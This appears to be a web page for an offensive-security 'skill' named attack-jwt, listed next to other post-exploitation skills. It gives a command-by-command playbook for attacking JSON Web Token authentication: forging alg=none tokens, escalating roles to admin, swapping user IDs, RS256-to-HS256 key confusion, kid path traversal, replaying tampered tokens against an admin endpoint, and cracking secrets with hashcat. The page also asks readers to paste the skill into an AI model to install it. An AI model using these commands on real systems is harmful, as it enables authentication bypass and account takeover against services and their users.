القائمة
JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
استنادا إلى تصنيف SOC المهني
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-jwt |
| description | JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["jwt","authentication","web","token","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-287","CWE-347","CWE-345"] |
| chains_with | ["attack-idor-automation"] |
| prerequisites | [] |
| severity_boost | {"attack-idor-automation":"JWT tampering + IDOR = full account takeover"} |
Exploit JWT implementation weaknesses to bypass authentication, escalate privileges, or forge tokens.
# Automated JWT analysis and tamper token generation
attack_script jwt_tamper EYTOKEN --json-output
# Manual decode
echo "HEADER.PAYLOAD.SIG" | cut -d. -f1 | base64 -d 2>/dev/null
echo "HEADER.PAYLOAD.SIG" | cut -d. -f2 | base64 -d 2>/dev/null
Check for:
alg field): RS256, HS256, nonerole, is_admin, sub, exp, aud, isskid): SQL injection, path traversal potential# Generate alg=none token
attack_script jwt_tamper EYTOKEN --set-header alg=none
# Role escalation
attack_script jwt_tamper EYTOKEN --set role=admin --set-header alg=none
# User ID swap
attack_script jwt_tamper EYTOKEN --set sub=1 --set-header alg=none
# HS256 with known/weak key
attack_script jwt_tamper EYTOKEN --set role=admin --key "secret"
If server uses RS256, try signing with the public key as HS256 secret:
# Fetch public key
curl -s https://TARGET/.well-known/jwks.json
# Convert JWK to PEM and sign
attack_script jwt_tamper EYTOKEN --set role=admin --key "$(cat public.pem)" --set-header alg=HS256
# SQL injection via kid
attack_script jwt_tamper EYTOKEN --set-header "kid=../../../../../../dev/null" --key ""
# kid pointing to accessible file
attack_script jwt_tamper EYTOKEN --set-header "kid=/proc/sys/kernel/hostname"
# Test tampered token
curl -s -H "Authorization: Bearer TAMPERED_TOKEN" https://TARGET/api/admin/users
| Attack | Severity |
|---|---|
| alg=none accepted — auth bypass | Critical (P1) |
| Role escalation via claim tampering | Critical (P1) |
| RS256→HS256 key confusion | Critical (P1) |
| Weak signing key (crackable) | High (P2) |
| kid SQL injection | Critical (P1) |
| Expired tokens accepted | Medium (P3) |
attack_script jwt_tamper — automated decode/tamper/re-encodejwt_tool (external) — comprehensive JWT testinghashcat -m 16500 — JWT secret cracking